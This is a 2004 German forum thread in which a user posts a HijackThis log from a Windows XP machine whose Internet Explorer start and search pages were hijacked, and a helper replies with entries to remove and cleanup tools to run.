fixe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/ R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ neustarten scanne mit mwav.exe...30 Tage free http://www.mwti.net/antivirus/free_utilities.asp Scanne mit AdAware free http://www.lavasoft.de/ Lade SpyHunter http://www.spy-bot.net/manual.asp loesche die TemporaryInternetFiles !!!!!!!!! Du hast noch irgendeinen dll drauf, die die Startseite verstellt...aber ich kann sie nicht sehen. Lade noch den CWHredder http://www.trojaner-info.de/anleitungen/hijackthis/about_blank.html Dann lade das Log noch mal, MfG Sabina __________ MfG Sabina rund um die PC-Sicherheit Dieser Beitrag wurde am 22.06.2004 um 07:45 Uhr von Sabina editiert.
|
|
|
||
was kann ich dagegen machen, virenscans haben nix gebracht, bzw haben welche erkannt und zerstört, alles systeme laufen, cpu auslastung normal
wer weiß was
direkte seitenangaben sind nurnoch mit http://
davor möglich, das war ein problem, nachdem adaware dies fand und behob ging es wieder normal, nun noch diese meldung der pfad monitor.exe ist.......
hier mein logfile
Logfile of HijackThis v1.97.7
Scan saved at 23:19:13, on 18.06.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\Programme\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\htpatch.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\HP\KBD\KBD.EXE
C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Programme\Winamp3\winampa.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\Programme\PicoZip\PicoZipTray.exe
C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe
C:\Programme\FinePixViewer\QuickDCF.exe
C:\WINDOWS\PCHEALTH\HELPCTR\Binaries\helpctr.exe
C:\WINDOWS\PCHealth\HelpCtr\Binaries\HelpSvc.exe
C:\WINDOWS\PCHealth\HelpCtr\Binaries\HelpHost.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Dokumente und Einstellungen\Eigene Dateien\Software\HijackThis.exe
C:\Programme\Messenger\msmsgs.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.de/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://de7.hpwis.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://de7.hpwis.com/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programme\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programme\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [HTpatch] C:\WINDOWS\htpatch.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [ATIPTA] C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Programme\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WinampAgent] "C:\Programme\Winamp3\winampa.exe"
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [WinDSL MTU-Adjust] WinDSL_MTU.exe
O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [REGSHAVE] C:\Programme\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [PicoZip] C:\Programme\PicoZip\PicoZipTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [monitor] Explorer.exe monitor.exe
O4 - Global Startup: DSLMON.lnk = C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe
O4 - Global Startup: Exif Launcher.lnk = ?
O14 - IERESET.INF: START_PAGE_URL=http://de7.hpwis.com
O16 - DPF: {19E28AFC-EAE3-4CE5-AC83-2407B42F57C9} (MSSecurityAdvisor Class) - http://download.microsoft.com/download/0/5/c/05c905f4-dd30-427d-a3de-373c3e5552fc/msSecAdv.cab?1087508194406
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{6A6A3C85-8FEA-438C-8BDF-72354B2AAE0F}: NameServer = 62.27.27.62 62.27.53.66